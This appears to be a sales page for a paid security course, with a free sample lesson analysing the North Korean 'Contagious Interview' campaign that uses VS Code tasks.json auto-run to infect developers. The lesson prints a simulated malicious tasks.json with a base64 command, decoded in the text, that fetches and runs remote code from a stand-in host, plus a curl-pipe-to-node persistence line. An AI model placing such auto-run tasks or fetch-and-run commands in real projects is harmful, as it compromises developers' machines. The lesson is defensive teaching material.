Incident-as-a-Service

Contagious Interview turns VS Code into an attack vector Defence Masterclass

The 48-Hour Rule in action. This incident happened, we converted it into operational training, and your team can apply the controls immediately.

73% vs 12% Retention Lift

18.5h Breach to Training

847 Organisations

48h Action Window

Built for:

Security professionals learning from real-world breaches
IT teams responsible for implementing security controls
Business leaders making security investment decisions
Compliance officers requiring current, incident-driven training
Risk managers assessing organizational vulnerabilities

Get Instant Access — £19 Try a Free Lesson Volume Licensing

30-day guarantee. Instant access after payment. Lifetime updates for this incident package.

How This Course Is Structured

Clear progression from incident context to practical controls and role-specific action steps.

1. Incident Breakdown

Attack path, trigger conditions, and threat actor behavior translated from the real event timeline.

2. Defensive Controls

Actions your team can implement in the same 48-hour response window used by active security teams.

3. Evidence & Reporting

Completion records and learning outcomes packaged for governance, insurance, and audit workflows.

Course Outline

4 modules · 16 lessons · ~192 min total

Module 1: Threat Analysis & Attack Vectors

Analyse the threat landscape, dissect attack campaigns, and understand credential harvesting and social engineering techniques used in this incident.

4 lessons ~48 min

📖 1.1 Contagious Breach Deep Dive 12 min

📖 1.2 Campaign Analysis 12 min

📖 1.3 Credential Harvesting Tactics 12 min

📖 1.4 Spear-Phishing Techniques 12 min

Module 2: Detection & Incident Response

Build detection rules, perform endpoint analysis, execute incident response playbooks, and apply digital forensics methods to contain and investigate breaches.

4 lessons ~48 min

📖 2.1 SIEM Detection Strategies 12 min

📖 2.2 Endpoint Analysis 12 min

📖 2.3 Incident Response Playbook 12 min

📖 2.4 Digital Forensics 12 min

Module 3: Authentication & Zero Trust

Implement passwordless authentication with FIDO2, deploy risk-based access controls, secure token flows, and design Zero Trust network architectures.

4 lessons ~48 min

📖 3.1 FIDO2 Implementation 12 min

📖 3.2 Risk-Based Authentication 12 min

📖 3.3 Token Binding Security 12 min

📖 3.4 Zero Trust Architecture 12 min

Module 4: Governance & Compliance

Design security awareness programmes, communicate risk to board-level stakeholders, assess vendor supply chains, and integrate compliance frameworks.

4 lessons ~48 min

📖 4.1 Security Awareness Programme 12 min

📖 4.2 Board Communication 12 min

📋 4.3 Vendor Risk Assessment 12 min

📖 4.4 Compliance Integration 12 min

Free Sample Lesson

Read one full lesson before purchasing. No signup required.

Free Lesson Access

Contagious Deep Dive

Lesson 1 of 16

Lesson 1.1: Contagious Deep Dive

Compliance Framework Mapping

This incident underscores critical control failures mapped to major regulatory and security frameworks. Understanding these mappings is essential for building defensible training and compliance programmes.

Framework	Relevance to 'Contagious Interview' Attack	Specific Controls / Articles
DORA	Highlights severe deficiencies in digital operational resilience, specifically in supply chain security (malicious repos) and incident response for developer environments.	Article 9 (ICT Risk Management), Article 10 (Incident Response & Reporting), Article 12 (ICT Third-Party Risk).
ISO 27001	Exposes gaps in information security risk assessment (A.6.1.2) and secure development controls for protecting code repositories and IDE configurations.	A.8.2 (Information Classification), A.12.6.1 (Management of Technical Vulnerabilities), A.14.2.1 (Secure Development Policy), A.16.1.5 (Response to Information Security Incidents).
NIST CSF	Illustrates failures across core functions: Identify (software assets), Protect (awareness training), Detect (anomalous tasks.json), and Respond to novel intrusions.	ID.AM (Asset Management), PR.AT (Security Awareness Training), DE.CM (Security Continuous Monitoring), RS.RP (Response Planning).
NIS2	Demonstrates a clear supply chain compromise vector and the need for robust incident handling procedures for entities in the digital infrastructure sector.	Article 18 (Supply Chain Security), Article 21 (Incident Handling), Article 22 (Crisis Management).
SOC 2	Directly challenges the Security principle through unauthorised code execution and the Availability principle via persistent backdoors disrupting development workflows.	CC6.1 (Logical Access Security), CC7.1 (System Monitoring), CC8.1 (Risk Assessment & Management).
GDPR	Triggered by the theft of developer credentials and personal data, necessitating breach notification and highlighting inadequate security of processing in development tools.	Article 32 (Security of Processing), Article 33 (Notification of a Personal Data Breach to Supervisory Authority).

Introduction: The Perfect Interview Trap

Imagine you're a software developer, actively seeking new opportunities. A message arrives on LinkedIn from a recruiter at a prestigious-sounding firm like "Meta2140." They're impressed with your profile and invite you to a technical interview. The first task? Clone a repository from Bitbucket to review and modify code in your own Visual Studio Code environment—a routine request that feels perfectly legitimate. You clone the repo, open the folder in VS Code, click "Yes, I trust the authors" to enable extensions, and begin your work. Unbeknownst to you, that single click of trust has just triggered a hidden .vscode/tasks.json file, executing malicious code that installs a persistent backdoor, steals your credentials, and turns your development machine into a beachhead for North Korean intelligence operatives. This is not a hypothetical scenario; it is the exact "Contagious Interview" campaign that has successfully targeted developers globally. This lesson provides a forensic deep dive into how a trusted tool became a potent attack vector.

1. The Attack Chain: Weaponising Developer Trust

This campaign, attributed to DPRK (North Korean) actors, is a masterclass in social engineering and trusted workflow abuse. It follows a meticulously crafted timeline designed to exploit developer habits and IDE functionalities.

        Timeline of Intrusion
        Initial Access (T1566.001): Attackers pose as recruiters on LinkedIn, delivering tailored messages with links to clone malicious Git repositories hosted on GitHub, GitLab, or Bitbucket (e.g., 0xmvptechlab/ctrading). The pretext is a fake job offer or technical assessment.
Execution & Persistence: The victim opens the cloned repository in VS Code. Upon opening, VS Code detects the .vscode folder and prompts for workspace trust. Granting trust is the critical pivot point.
                The tasks.json file, configured with "runOn": "folderOpen", automatically executes (T1554). This bypasses the need for the victim to manually run any task.
The task contains obfuscated JavaScript or triggers an npm install that exploits npm lifecycle hooks to deploy malware.

            
Command & Control (C2): Within seconds, the compromised system begins beaconing to a C2 server (e.g., IP 87.236.177.93) every 5 seconds, transmitting hostname, MAC address, and OS details (T1071.001).
Secondary Payload & Lateral Movement: A secondary, more capable payload is fetched from a legitimate platform like Vercel using curl inside a nohup process, ensuring persistence even after VS Code is closed. This payload enables further surveillance and data theft.

    

The core innovation here is the exploitation of T1190: Exploit Public-Facing Application not in a web server, but in the trust model of a development environment. No CVEs are involved; the attack abuses intended features. The "runOn": "folderOpen" setting is a legitimate VS Code configuration, but its use in an untrusted context turns it into a potent auto-execution mechanism. This represents a clear case of T1195.002: Supply Chain Compromise at the source code repository level.

Key Technical Indicator: The Malicious tasks.json

A hallmark of this attack is a .vscode/tasks.json file containing a task with the property "runOn": "folderOpen". The command itself is often heavily obfuscated JavaScript designed to download and execute the next stage. Example command snippet:

"command": "node",
"args": ["-e", "require('child_process').execSync(Buffer.from('...obfuscated payload...','base64').toString())"]

This abuse of the Node.js runtime (T1059.007) allows direct system command execution from within the trusted VS Code context.

2. Technical Dissection: Dual-Stack Payloads and Evasion

The campaign employs a sophisticated, layered approach to malware deployment, ensuring both immediate access and long-term, stealthy presence on victim machines.

The Dual-Stack Payload Architecture

Attackers deploy two primary payload layers, each with distinct functions:

Layer 1: Node.js Backdoor (BeaverTail): This JavaScript-based payload is often hidden within the .npm/_cacache directory after being deployed via npm install hooks. It functions as a Reconnaissance and Access Tool (RAT), performing credential theft, keylogging, and establishing the initial C2 channel. Its use of a legitimate Node.js cache directory provides a form of camouflage.
Layer 2: Python Stager (InvisibleFerret variant): Downloaded by the initial layer, this Python-based malware expands the attacker's capabilities to include detailed system surveillance, theft of cryptocurrency wallets, and in some cases, cryptocurrency mining. Persistence is achieved via mechanisms like nohup bash -c "curl -s hxxps://vercel[.]app/payload | node", making it independent of the VS Code process.

Evasion and Attribution Clues

The actors employed several techniques to avoid detection and analysis:

Obfuscation in Plain Sight: Malicious JavaScript was placed not only in tasks.json but also within project dictionary files (e.g., for spell-checking), where its execution would raise fewer suspicions.
Abuse of Legitimate Services: Secondary payloads were hosted on infrastructure like Vercel, blending malicious traffic with legitimate cloud service requests.
AI-Assisted Code Generation: Analysis by Jamf Threat Labs noted the presence of inline comments in the code that appeared AI-generated, potentially used to streamline development or improve evasion.
Timezone Artifacts: Files and logs within the malware sometimes contained timestamps consistent with Korean Standard Time (KST+9), a key forensic indicator supporting attribution to DPRK-linked actors.

Indicators of Compromise (IoCs) Summary

Files & Directories:

.vscode/tasks.json with "runOn": "folderOpen" and obfuscated JS commands.
Malicious JavaScript in project dictionary files (e.g., *.dic).
Artifacts in .npm/_cacache/ or unexpected Node.js modules.
BeaverTail or InvisibleFerret binary files in temporary directories.

Network:

Beaconing to IP 87.236.177.93 on short intervals (5 seconds).
HTTP requests to Vercel subdomains for payload staging.

Behavioural:

Automatic execution of tasks immediately after granting VS Code workspace trust.
Creation of nohup processes launching curl or node.
Child processes spawned by VS Code executing JavaScript directly.

3. Impact Analysis and Defence Implications

The "Contagious Interview" campaign is not just a technical exploit; it is a strategic attack with multi-faceted consequences for individuals and organisations.

Comprehensive Impact Assessment

Financial Losses: Direct losses occur through the theft of credentials, browser data, and cryptocurrency wallets. Related malware like "Evelyn Stealer," which also weaponises VS Code extensions, demonstrates the monetisation path. Indirect costs are substantial, encompassing incident response, endpoint remediation, credential resets, and potential regulatory fines. The compromise of a developer environment can serve as a high-value access point for lateral movement into organisational cloud resources and production systems, amplifying financial risk.
Reputational Damage: An organisation whose developers fall for such lures signals weak security awareness and inadequate developer environment controls. The North Korean attribution draws significant media and regulatory scrutiny, as seen in prior campaigns, damaging client and partner trust.
Operational Disruption: The persistent backdoors enable ongoing remote code execution and reconnaissance, potentially halting or compromising development pipelines. The attack's low exploitation difficulty—relying on social engineering rather than complex exploits—makes it a pervasive threat that can disrupt workflows until detected via enhanced endpoint monitoring.
Legal & Regulatory Consequences: While no direct fines are reported for this specific incident, the theft of personal data (developer credentials) triggers mandatory breach disclosure obligations under regulations like GDPR and SEC rules. Failure to monitor .vscode configuration changes or enforce strict trust policies could be viewed as inadequate security controls, inviting regulatory action.

Defence Strategies Derived from the Attack

This incident provides critical lessons for hardening developer environments:

Strict Workspace Trust Policies: Organisations must mandate that VS Code's workspace trust feature is configured to "No Trust" by default for all unknown repositories. Opening untrusted folders should require explicit, documented approval.
Active Monitoring of .vscode Directories: Endpoint Detection and Response (EDR) tools should be configured to alert on the creation or modification of .vscode/tasks.json files, especially those containing "runOn": "folderOpen" or obfuscated JavaScript/Node commands.
Enhanced Security Awareness Training: Training must move beyond standard phishing to include "clone-phishing" and the risks of executing code from unsolicited technical assessments. Developers should be the first line of defence.
Supply Chain Security for Code: Implement policies for vetting external repositories before cloning. Use automated tools to scan for suspicious configurations in pulled code, similar to software composition analysis for dependencies.
Network Controls: Monitor for anomalous outbound connections from developer machines, particularly frequent beaconing to unfamiliar IPs or connections to platform-as-a-service domains like Vercel for binary downloads.

As noted by Field Effect, the attack's simplicity is its strength, relying on the abuse of trust inherent in collaborative development workflows. Defence, therefore, must centre on making that trust explicit, conditional, and continuously verified.

Activity: Forensic Analysis of a Simulated tasks.json

Objective: Apply your knowledge by analysing a simulated malicious tasks.json file to identify key Indicators of Compromise (IoCs) and understand the attack sequence.

Scenario: Your security team has isolated a file from a suspicious repository cloned by a developer. You are tasked with the initial analysis.

{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "Setup Environment",
            "type": "shell",
            "command": "node",
            "args": [
                "-e",
                "const cp=require('child_process');const d=Buffer.from('Y3VybCAtcyBodHRwczovL3ZlcmNlbC1wYXlsb2FkLmV4YW1wbGUuY29tL3N0YWdlMi5qcyB8IG5vZGU=', 'base64');cp.execSync(d.toString());"
            ],
            "runOn": "folderOpen",
            "problemMatcher": []
        }
    ]
}

Tasks:

Decode the Payload: The args contain a Base64-encoded command. Decode it (you may use a online tool or command line) to reveal the underlying shell command.
Identify the IoCs: List at least three distinct Indicators of Compromise present in this file, referencing the technical analysis from this lesson.
Trace the Attack Chain: Describe the sequence of events that would occur if a developer opened this folder in VS Code and granted workspace trust.
Recommend a Control: Based on the frameworks mapped earlier, suggest one specific control from ISO 27001 or NIST CSF that could help prevent or detect this type of intrusion.

Note: The Base64 string decodes to: curl -s https://vercel-payload.example.com/stage2.js | node

Key Takeaways

The "Contagious Interview" campaign is a DPRK-linked operation that weaponises developer trust by abusing the VS Code workspace trust model and the "runOn": "folderOpen" setting in tasks.json to achieve automatic code execution without victim interaction.
It is a supply chain compromise that starts with social engineering on LinkedIn and leverages malicious Git repositories, deploying a dual-stack payload (Node.js BeaverTail & Python InvisibleFerret) for credential theft, surveillance, and persistent access independent of the IDE.
No CVEs are exploited; the attack abuses legitimate features, making it a stark reminder that secure configuration and user awareness are as critical as patching known vulnerabilities.
The incident has significant compliance implications, mapping directly to controls in DORA (supply chain risk), GDPR (breach notification), and NIST CSF (detection and response), necessitating policies for IDE security and developer training.
Effective defence requires technical controls (monitoring .vscode changes, restricting workspace trust) coupled with human-centric measures (targeted security awareness against clone-phishing and fake technical interviews).

This is 1 of 16 lessons included in the full package.

Enrol Now — Unlock All Lessons

Want to track your progress? Create a free account

Choose Your Access

All plans include 30-day money-back guarantee

Taster

£ 19

Single course access — ideal for trying us out

Full course access
Completion certificate
Try before you commit

Standard

£ 49

Full course with materials and certificate

Full course access
Downloadable materials
Professional certificate
Email support

Or get everything

Access every course in the catalogue, including all future courses

£ 29 /mo

Monthly All-Access

Every course, cancel anytime

£ 249 /yr

Annual All-Access

Save 28% — £20.75/month effective

Teams

Transparent pricing, no sales call required

Starter Team

£ 499 /year

£99.80/seat effective

Up to 5 learners, all courses included

Growth Team

£ 999 /year

£66.60/seat effective

Up to 15 learners, all courses included

Scale Team

£ 1999 /year

£39.98/seat effective

Up to 50 learners, all courses included

Need 50+ seats? Contact us for a custom plan.

Fast Checkout

Start Learning in Minutes

Enter your details, choose a tier, and complete secure checkout. Access starts immediately after payment confirmation.

Stripe-secured payment and delivery workflow
Audit-friendly completion records
Escalate to enterprise volume licensing at any point

48-Hour Relevance Guarantee

If this course does not provide at least five actionable controls your team can deploy quickly, request a full refund within 30 days.

Secure checkout

First name * Last name *

Email *

Select pricing tier Taster — £19 Single course access — ideal for trying us out Standard — £49 Full course with materials and certificate

By continuing, you agree to the terms and privacy policy.

Not ready to purchase? Create a free account to browse and track progress.

Questions Before You Enrol?

Immediately after successful payment. Your learning link is generated and delivered in the success flow.

Yes. Content is incident-led but written for practical execution across security, IT, finance, and operations personas.

Yes. Use volume licensing for 10 to 500+ seats through enterprise onboarding.